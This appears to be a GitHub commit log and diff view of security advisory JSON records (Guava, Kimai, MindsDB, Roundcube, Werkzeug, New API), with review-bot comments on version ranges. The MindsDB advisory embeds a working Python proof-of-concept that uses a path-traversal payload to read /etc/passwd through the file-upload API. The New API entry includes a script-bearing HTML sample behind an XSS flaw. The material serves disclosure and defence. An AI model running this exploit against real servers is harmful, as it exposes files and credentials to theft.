77 commits
2a4cc40
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
03399a2
Publish Advisories
advisory-database[bot] Feb 20, 2026
8b38a69
Publish Advisories
advisory-database[bot] Feb 20, 2026
86b2861
Publish Advisories
advisory-database[bot] Feb 20, 2026
7b0594e
Publish Advisories
advisory-database[bot] Feb 20, 2026
f9e9f64
Publish Advisories
advisory-database[bot] Feb 20, 2026
e4ed87a
Publish Advisories
advisory-database[bot] Feb 20, 2026
da86798
Publish Advisories
advisory-database[bot] Feb 20, 2026
4f3178c
Publish Advisories
advisory-database[bot] Feb 20, 2026
f6494f1
Publish Advisories
advisory-database[bot] Feb 20, 2026
f0ae703
Publish Advisories
advisory-database[bot] Feb 20, 2026
9e37ed4
Publish GHSA-qqhf-pm3j-96g7
advisory-database[bot] Feb 20, 2026
6ecbb5d
Publish Advisories
advisory-database[bot] Feb 20, 2026
5c53a25
Publish Advisories
advisory-database[bot] Feb 20, 2026
2112e7a
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
16b4db1
Publish GHSA-2ww3-72rp-wpp4
advisory-database[bot] Feb 20, 2026
1f80578
Publish Advisories
advisory-database[bot] Feb 20, 2026
4d1cb89
Publish Advisories
advisory-database[bot] Feb 20, 2026
c06dd00
Publish GHSA-2g4f-4pwh-qvx6
advisory-database[bot] Feb 20, 2026
abeec1b
Publish GHSA-wh94-p5m6-mr7j
advisory-database[bot] Feb 20, 2026
4892a03
Publish GHSA-r6h2-5gqq-v5v6
advisory-database[bot] Feb 20, 2026
ef3ccde
Publish GHSA-w45g-5746-x9fp
advisory-database[bot] Feb 20, 2026
caae1cc
Publish Advisories
advisory-database[bot] Feb 20, 2026
15ca792
Publish GHSA-378v-28hj-76wf
advisory-database[bot] Feb 20, 2026
f9abce7
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
ebf4870
Publish GHSA-6qr9-g2xw-cw92
advisory-database[bot] Feb 20, 2026
3c5089d
Publish GHSA-8j8w-wwqc-x596
advisory-database[bot] Feb 20, 2026
d19ea1e
Publish GHSA-cxpw-2g23-2vgw
advisory-database[bot] Feb 20, 2026
a8170f7
Publish Advisories
advisory-database[bot] Feb 20, 2026
583028d
Publish Advisories
advisory-database[bot] Feb 20, 2026
7b171aa
Publish Advisories
advisory-database[bot] Feb 20, 2026
c0da40a
Advisory Database Sync
advisory-database[bot] Feb 21, 2026
4a25af6
Publish GHSA-gfw7-2v73-69wg
advisory-database[bot] Feb 21, 2026
715a73b
Publish Advisories
advisory-database[bot] Feb 21, 2026
1cb2f15
Publish Advisories
advisory-database[bot] Feb 21, 2026
b81a27c
Publish Advisories
advisory-database[bot] Feb 21, 2026
44095bd
Publish Advisories
advisory-database[bot] Feb 21, 2026
30c3276
Publish Advisories
advisory-database[bot] Feb 21, 2026
6fbb688
Publish Advisories
advisory-database[bot] Feb 21, 2026
493d991
Publish Advisories
advisory-database[bot] Feb 22, 2026
9632124
Publish Advisories
advisory-database[bot] Feb 22, 2026
1b8b37e
Publish Advisories
advisory-database[bot] Feb 22, 2026
5552854
Publish Advisories
advisory-database[bot] Feb 22, 2026
2ab36c6
Publish Advisories
advisory-database[bot] Feb 22, 2026
a53df6e
Publish Advisories
advisory-database[bot] Feb 22, 2026
90d3ff7
Publish Advisories
advisory-database[bot] Feb 22, 2026
241db5f
Publish Advisories
advisory-database[bot] Feb 22, 2026
03f1c80
Publish Advisories
advisory-database[bot] Feb 23, 2026
ace7bff
Publish Advisories
advisory-database[bot] Feb 23, 2026
395d01f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
a1043d8
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
f58705f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
d56d988
Publish Advisories
advisory-database[bot] Feb 23, 2026
153075b
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
8bd7c1f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
86cca5d
Publish GHSA-qq67-mvv5-fw3g
advisory-database[bot] Feb 23, 2026
e323cf2
Publish GHSA-w6x6-9fp7-fqm4
advisory-database[bot] Feb 23, 2026
ee45bba
Publish GHSA-299v-8pq9-5gjq
advisory-database[bot] Feb 23, 2026
131b189
Publish GHSA-xxh2-68g9-8jqr
advisory-database[bot] Feb 23, 2026
4088f0c
Publish Advisories
advisory-database[bot] Feb 23, 2026
819404a
Publish Advisories
advisory-database[bot] Feb 23, 2026
2f2f37a
Publish Advisories
advisory-database[bot] Feb 23, 2026
895a0c3
Publish Advisories
advisory-database[bot] Feb 23, 2026
c4a8d9a
Publish Advisories
advisory-database[bot] Feb 23, 2026
66ce563
Publish Advisories
advisory-database[bot] Feb 23, 2026
df24333
Publish Advisories
advisory-database[bot] Feb 23, 2026
bc90ce7
Publish Advisories
advisory-database[bot] Feb 23, 2026
661e2a1
Publish GHSA-r6v5-fh4h-64xc
advisory-database[bot] Feb 23, 2026
60eb5cc
Publish GHSA-mjjp-xjfg-97wg
advisory-database[bot] Feb 23, 2026
cdb3c51
Publish GHSA-2g4f-4pwh-qvx6
advisory-database[bot] Feb 23, 2026
25b7d8a
Publish GHSA-5mg8-w23w-74h3
advisory-database[bot] Feb 23, 2026
b6c5c52
Advisory Database Sync
advisory-database[bot] Feb 24, 2026
bb98158
Publish Advisories
advisory-database[bot] Feb 24, 2026
98d3857
Publish Advisories
advisory-database[bot] Feb 24, 2026
19beec9
Advisory Database Sync
advisory-database[bot] Feb 24, 2026
5e588eb
Publish Advisories
advisory-database[bot] Feb 24, 2026
8be3abb
Publish Advisories
advisory-database[bot] Feb 24, 2026
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mg8-w23w-74h3",
"modified": "2023-08-18T15:56:36Z",
"modified": "2026-02-23T22:45:53Z",
"published": "2021-03-25T17:04:19Z",
"aliases": [
"CVE-2020-8908"
],
"summary": "Information Disclosure in Guava",
"details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n",
"details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.",
"severity": [
{
"type": "CVSS_V3",
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8v38-pw62-9cw2",
"modified": "2025-12-20T03:15:43Z",
"modified": "2026-02-20T19:56:16Z",
"published": "2022-02-18T00:00:33Z",
"aliases": [
"CVE-2022-0639"
Expand All @@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
"introduced": "1.0.0"
},
{
"fixed": "1.5.7"
Expand Down
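Review bot: Raising `introduced` from `"0"` to `"1.0.0"` in the ECOSYSTEM range (the same pattern appears in the next section, GHSA-rqff-837h-mm52, where `"0"` becomes `"0.1.0"`) narrows the affected set so that every release below the new floor is now reported as unaffected, and nothing in the visible hunks records where the floor comes from. If the intent is to match the first published release rather than to assert that earlier versions are clean, the justifying commit or release should appear in `references`, since downstream scanners treat the lower bound as authoritative. The `ranges` object continues outside this hunk, so any `fixed`/`last_affected` events after `"1.5.7"` are not in view.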
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-rqff-837h-mm52",
"modified": "2022-02-24T14:00:06Z",
"modified": "2026-02-20T19:56:07Z",
"published": "2022-02-15T00:02:46Z",
"aliases": [
"CVE-2022-0512"
Expand All @@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
"introduced": "0.1.0"
},
{
"fixed": "1.5.6"
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-pmc3-p9hx-jq96",
"modified": "2026-02-18T23:34:53Z",
"modified": "2026-02-20T16:51:12Z",
"published": "2025-04-23T14:43:44Z",
"aliases": [
"CVE-2026-26994"
Expand Down Expand Up @@ -40,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-pmc3-p9hx-jq96"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26994"
},
{
"type": "WEB",
"url": "https://github.com/refraction-networking/utls/issues/181"
Expand All @@ -64,6 +68,6 @@
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2025-04-23T14:43:44Z",
"nvd_published_at": null
"nvd_published_at": "2026-02-20T03:16:01Z"
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8j8w-wwqc-x596",
"modified": "2025-12-22T18:41:25Z",
"modified": "2026-02-20T21:48:11Z",
"published": "2025-06-02T06:30:32Z",
"aliases": [
"CVE-2025-49113"
Expand Down Expand Up @@ -99,6 +99,10 @@
"type": "WEB",
"url": "https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-49113"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-49113-roundcube-mitigation-script"
Expand Down
Original file line number Diff line number Diff line change
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-cv8h-r7r5-vwj9",
"modified": "2025-12-19T21:30:20Z",
"modified": "2026-02-20T18:25:02Z",
"published": "2025-12-19T21:30:20Z",
"aliases": [
"CVE-2023-53957"
],
"summary": "Kimai contains a SameSite cookie vulnerability",
"details": "Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.",
"severity": [
{
Expand All @@ -14,18 +15,38 @@
},
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "kimai/kimai"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.30.10"
}
]
}
]
}
],
"affected": [],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53957"
},
{
"type": "WEB",
"url": "https://github.com/kimai/kimai/releases/tag/1.30.10"
"type": "PACKAGE",
"url": "https://github.com/kimai/kimai"
},
{
"type": "WEB",
Expand All @@ -41,8 +62,8 @@
"CWE-1275"
],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"github_reviewed": true,
"github_reviewed_at": "2026-02-20T18:25:02Z",
"nvd_published_at": "2025-12-19T21:15:52Z"
}
}
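Review bot: The new `affected` entry closes its range with `"last_affected": "1.30.10"` and no `fixed` event, while the details describe 1.30.10 as vulnerable and no fix commit or release is referenced in view; consumers that read `last_affected` as an inclusive upper bound will report 1.30.11 and later as clean even though no fix is documented. If a fixed release is known, a `{"fixed": "<FIXED_VERSION>"}` event is the right closure; if not, a note in `details` that later versions are unverified would keep the range honest. The same change also replaces the `https://github.com/kimai/kimai/releases/tag/1.30.10` WEB reference with a PACKAGE link, dropping the only version-specific pointer, and keeping both entries is the usual pattern. The first hunk of this section starts mid-object at old line 14.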
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-mjjp-xjfg-97wg",
"modified": "2026-01-13T18:31:53Z",
"modified": "2026-02-23T22:38:58Z",
"published": "2026-01-10T12:30:16Z",
"aliases": [
"CVE-2025-15504"
Expand Down Expand Up @@ -102,7 +102,8 @@
],
"database_specific": {
"cwe_ids": [
"CWE-404"
"CWE-404",
"CWE-476"
],
"severity": "LOW",
"github_reviewed": true,
Expand Down
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-qqhf-pm3j-96g7",
"modified": "2026-01-20T18:22:20Z",
"modified": "2026-02-20T16:54:21Z",
"published": "2026-01-12T16:10:55Z",
"aliases": [
"CVE-2025-68472"
],
"summary": "MindsDB has improper sanitation of filepath that leads to information disclosure and DOS",
"details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. Severity: High.\n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. 
Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.",
"details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. \n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. 
Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n4. Detailed report is available on BlueRock's blog: https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.",
"severity": [
{
"type": "CVSS_V3",
Expand Down Expand Up @@ -51,6 +51,10 @@
{
"type": "WEB",
"url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.11.1"
},
{
"type": "WEB",
"url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal"
}
],
"database_specific": {
Expand Down
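Review bot: Removing `Severity: High.` from the summary paragraph leaves a trailing space before the paragraph break (`sensitive data. \n\n`) in the new `details` string; trimming it to `sensitive data.\n\n` gives a clean line end for markdown rendering and for anything that diffs or hashes the text. The `references` hunk that adds the blog link starts mid-array at line 51, so its surrounding entries are not in view.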
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
{
"schema_version": "1.4.0",
"id": "GHSA-299v-8pq9-5gjq",
"modified": "2026-02-23T22:10:25Z",
"published": "2026-02-23T22:10:25Z",
"aliases": [
"CVE-2026-25802"
],
"summary": "New API has Potential XSS in its MarkdownRenderer component",
"details": "### Summary\n\nA potential unsafe operation occurs in component `MarkdownRenderer.jsx`, allowing for Cross-Site Scripting(XSS) when the model outputs items containing `<script>` tag.\n\n### Details\n\nLine 212-231 of `MarkdownRenderer.jsx` is unsafe, it use dangerouslySetInnerHTML to preview html the model generates. This can trigger malcious scripts.\n\n### PoC\n\nA simple way to exploit that is to ask the model in the playground, with prompt: \"请帮我写个脚本,跳转到google\", and then the browser will navigate to the google.com without user interference.\n\n### Impact\n\nPotential malcious activity to the user using playground, if the model api is altered to output unintended codes.\n\nAlso, users may not be easily rid the exploit, since the record of the chat containing XSS script is stored, once opening the page later, the script will be re-triggered.\n\n### Potential Workaround\n\nThe preview may be placed in an iframe sandbox, dangerous html strings should be purified before rendering.\n\n---\n\nThe reply generated for test is as below:\n\n这是一个为您编写的单页 HTML 文件。它使用了两种方式来实现跳转,以确保在任何情况下都能工作:\n\n1. **JavaScript (`window.location.replace`)**:这是最常用且高效的方法,它会立即跳转,并且不会保留当前页面在浏览器历史记录中(这样用户按“后退”键不会回到这个跳转页)。\n2. **HTML Meta Refresh**:作为后备方案。如果用户的浏览器禁用了 JavaScript,这个标签会在 1 秒后将用户带往 Google。\n3. 
**手动链接**:页面中显示了一个备用链接,以防自动跳转被拦截或失效。\n\n您可以直接保存以下代码为 `.html` 文件并在浏览器中打开。\n\n```html\n<!DOCTYPE html>\n<html lang=\"zh-CN\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>正在跳转至 Google...</title>\n \n <!-- 方法1:HTML Meta Refresh (如果JS被禁用,1秒后自动跳转) -->\n <meta http-equiv=\"refresh\" content=\"1;url=https://www.google.com\">\n\n <style>\n /* 基础重置与布局 */\n body, html {\n height: 100%;\n margin: 0;\n font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n background-color: #f8f9fa;\n color: #202124;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n /* 卡片容器样式 */\n .redirect-card {\n background: white;\n padding: 2rem 3rem;\n border-radius: 12px;\n box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);\n text-align: center;\n max-width: 400px;\n width: 90%;\n }\n\n /* 加载动画圆圈 */\n .spinner {\n border: 4px solid #f3f3f3;\n border-top: 4px solid #4285f4; /* Google Blue */\n border-radius: 50%;\n width: 40px;\n height: 40px;\n animation: spin 1s linear infinite;\n margin: 0 auto 1.5rem auto;\n }\n\n /* 文本排版 */\n h1 {\n font-size: 1.25rem;\n margin-bottom: 0.5rem;\n font-weight: 500;\n }\n\n p {\n font-size: 0.95rem;\n color: #5f6368;\n margin-bottom: 1.5rem;\n line-height: 1.5;\n }\n\n /* 手动链接样式 */\n .manual-link {\n display: inline-block;\n color: #1a73e8; /* Google Link Blue */\n text-decoration: none;\n font-weight: 500;\n padding: 0.5rem 1rem;\n border: 1px solid #dadce0;\n border-radius: 4px;\n transition: background-color 0.2s;\n }\n\n .manual-link:hover {\n background-color: #f1f3f4;\n text-decoration: underline;\n }\n\n /* 动画定义 */\n @keyframes spin {\n 0% { transform: rotate(0deg); }\n 100% { transform: rotate(360deg); }\n }\n </style>\n</head>\n<body>\n\n <main class=\"redirect-card\">\n <!-- 视觉反馈:加载动画 -->\n <div class=\"spinner\"></div>\n \n <!-- 提示信息 -->\n <h1>正在为您跳转</h1>\n <p>我们正在将您引导至 Google。<br>如果页面没有自动刷新,请点击下方的按钮。</p>\n \n 
<!-- 手动跳转链接 -->\n <a href=\"https://www.google.com\" class=\"manual-link\">立即前往 Google</a>\n </main>\n\n <script>\n // 方法2:JavaScript 跳转 (推荐)\n // 使用 replace() 而不是 href,这样用户点击“后退”时不会死循环回到这个跳转页\n (function() {\n // 目标地址\n var targetUrl = \"https://www.google.com\";\n\n // 执行跳转\n window.location.replace(targetUrl);\n \n // 控制台日志(用于调试)\n console.log(\"Redirecting to: \" + targetUrl);\n })();\n </script>\n\n</body>\n</html>\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L"
}
],
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/QuantumNous/new-api"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.8-alpha.9"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq"
},
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b"
},
{
"type": "PACKAGE",
"url": "https://github.com/QuantumNous/new-api"
}
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-23T22:10:25Z",
"nvd_published_at": null
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-29vq-49wr-vm6x",
"modified": "2026-02-19T20:32:45Z",
"modified": "2026-02-23T22:27:37Z",
"published": "2026-02-19T20:32:45Z",
"aliases": [
"CVE-2026-27199"
Expand Down Expand Up @@ -40,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d"
Expand All @@ -60,6 +64,6 @@
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-19T20:32:45Z",
"nvd_published_at": null
"nvd_published_at": "2026-02-21T06:17:00Z"
}
}